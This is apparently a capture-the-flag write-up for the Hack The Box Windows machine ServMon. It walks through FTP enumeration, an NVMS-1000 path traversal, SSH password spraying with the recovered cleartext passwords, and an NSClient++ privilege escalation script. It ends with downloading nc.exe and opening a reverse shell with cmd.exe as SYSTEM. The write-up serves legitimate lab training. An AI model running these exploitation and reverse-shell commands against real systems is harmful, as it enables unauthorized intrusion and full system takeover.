ServMon Writeup

19 February 2023 #CTF #HTB #box #easy #windows

servmon info


You already know, it's nmap time:

$ sudo nmap -n -Pn -sCV -oN enum/initial.nmap
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_02-28-22  06:35PM       <DIR>          Users
22/tcp   open  ssh           OpenSSH for_Windows_8.0 (protocol 2.0)
| ssh-hostkey: 
|   3072 c71af681ca1778d027dbcd462a092b54 (RSA)
|   256 3e63ef3b6e3e4a90f34c02e940672e42 (ECDSA)
|_  256 5a48c8cd39782129effbae821d03adaf (ED25519)
80/tcp   open  http
| fingerprint-strings: 
|   GetRequest, HTTPOptions, RTSPRequest: 
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo: 
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
|     <html xmlns="">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL: 
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
| fingerprint-strings: 
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions: 
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest: 
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
|_ssl-date: TLS randomness does not represent time
| http-title: NSClient++
|_Requested resource was /index.html
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-02-10T13:38:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required


As nmap told us, we can login anonymously to this FTP server. Inside the Users folder, there are 2 other folders:

ftp> cd Users
250 CWD command successful.
ftp> ls
229 Entering Extended Passive Mode (|||49685|)
125 Data connection already open; Transfer starting.
02-28-22  06:36PM       <DIR>          Nadine
02-28-22  06:37PM       <DIR>          Nathan

Two potential usernames. Looking in Nadine's directory, there is just one text file:


I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.



Okay, it seems like there is a file called Passwords.txt in Nathan's desktop.

In Nathan's directory there is also one text file:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint


Unlike with FTP, we can't access SMB anonymously:

$ smbclient -NL
session setup failed: NT_STATUS_ACCESS_DENIED
$ rpcclient -U '%' -N
Cannot connect to server.  Error was NT_STATUS_ACCESS_DENIED


Port 80

We get a login page:

NVMS-1000 login

It is pointless to try default credentials as stated in the file in Nathan's FTP folder (He changed the password).

Port 8443

Here we (are supposed to) have a network monitoring application:


The page was kinda broken for me.


LFI in NVMS-1000

Looking for known vulnerabilities in NVMS-1000, we come across a LFI in the URL.

Let's see if it works by trying to get the Password.txt file on Nathan's desktop:

$ curl -s --path-as-is ''

Nice, we get a bunch of passwords!

Password Spraying

With a password list and 2 usernames, we can try spraying these passwords against each username and hope for the best. SSH is listening on this Windows box so we'll try it first:

$ cme ssh -u users.txt -p passwords.txt
SSH    22     [*] SSH-2.0-OpenSSH_for_Windows_8.0
SSH    22     [-] Nadine:1nsp3ctTh3Way2Mars! Authentication failed.
SSH    22     [-] Nadine:Th3r34r3To0M4nyTrait0r5! Authentication failed.
SSH    22     [-] Nadine:B3WithM30r4ga1n5tMe Authentication failed.
SSH    22     [+] Nadine:L1k3B1gBut7s@W0rk

Great, we can log in as Nadine.


We can find the NSClient++ config file in C:\Program Files\NSClient++\nsclient.ini:

nadine@SERVMON C:\Program Files\NSClient++>type nsclient.ini
; Undocumented key
password = ew2x6SsGTxjRwXOT

; Undocumented key
allowed hosts =

We get the password used to access the application and we learn that only localhost is allowed. That means even with the correct password, we can't access it from our attack box (it was also referenced in Nathan's file inside the FTP server).

Luckily, we can use SSH to forward a local port:

$ ssh -L 8443: nadine@
nadine@'s password:

This will open port 8443 on our attack box and forward it to port 8443 on the remote box (on the localhost interface).

We can use this exploit script to create a custom script in NSClient++ that will get executed by NT AUTHORITY\SYSTEM:

$ ./ -t -P 8443 -p ew2x6SsGTxjRwXOT -c 'ping -n 2'
[!] Targeting base URL
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Enabling External Scripts Module . . .
[!] Configuring Script with Specified Payload . . .
[+] Added External Script (name: PFvFSEzz)
[!] Saving Configuration . . .
[!] Reloading Application . . .
[!] Waiting for Application to reload . . .
[!] Obtaining Authentication Token . . .
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[!] Triggering payload, should execute shortly . . .

After a few seconds we get something in tcpdump:

$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
14:01:24.046322 IP > ICMP echo request, id 1, seq 1, length 40
14:01:24.046364 IP > ICMP echo reply, id 1, seq 1, length 40
14:01:25.131476 IP > ICMP echo request, id 1, seq 2, length 40
14:01:25.131501 IP > ICMP echo reply, id 1, seq 2, length 40

This confirms we can indeed execute code.

To get a reverse shell we'll upload nc.exe to the box:

nadine@SERVMON C:\Users\Nadine\Downloads>curl.exe -O

And now we can just execute it via the exploit script:

$ ./ -t -P 8443 -p ew2x6SsGTxjRwXOT -c 'C:\Users\Nadine\Downloads\nc.exe 443 -e cmd.exe'

Again, wait a few seconds and enjoy the reverse shell as NT AUTHORITY\SYSTEM:

$ nc -lnvp 443
Ncat: Version 7.93 ( )
Ncat: Listening on :::443
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 10.0.17763.864]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
nt authority\system

Key Takeaways